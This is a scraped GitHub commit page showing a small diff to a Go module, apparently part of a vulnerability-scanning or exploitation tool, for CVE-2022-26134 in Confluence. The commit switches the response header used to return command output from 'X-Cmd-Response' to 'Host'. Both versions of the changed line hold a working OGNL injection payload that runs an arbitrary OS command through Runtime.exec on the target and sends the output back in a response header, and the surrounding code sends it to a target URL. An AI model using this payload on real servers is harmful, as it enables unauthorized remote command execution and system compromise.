Skip to content

Commit 3019c68

Browse files
SummerSecSummerSec
committed
🪂 修改CVE-2022-26134的Response头为Host
1 parent 48d898d commit 3019c68

File tree

1 file changed

+2
-2
lines changed

1 file changed

+2
-2
lines changed

cmd/commons/poc/2022/CVE-2022-26134.go

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -35,7 +35,7 @@ func (t CVE202226134) SendPoc(target string, hashmap map[string]interface{}) {
3535
}
3636
cmd = th
3737
}
38-
payload := fmt.Sprintf("${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec(\"%s\").getInputStream(),\"utf-8\")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\"X-Cmd-Response\",#a))}", cmd)
38+
payload := fmt.Sprintf("${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec(\"%s\").getInputStream(),\"utf-8\")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\"Host\",#a))}", cmd)
3939
payload, _ = req2.Encode(payload, "utf8")
4040
target1 := target + payload + "/"
4141

@@ -44,7 +44,7 @@ func (t CVE202226134) SendPoc(target string, hashmap map[string]interface{}) {
4444

4545
resp := utils.Send(reqmap)
4646

47-
res := resp2.HandlerRespHeader(resp, "X-Cmd-Response")
47+
res := resp2.HandlerRespHeader(resp, "Host")
4848
if t.CheckExp(resp, target1, hashmap) {
4949
if res != "" {
5050
//res = utils.DecodeBase64String(res)

0 commit comments

Comments
 (0)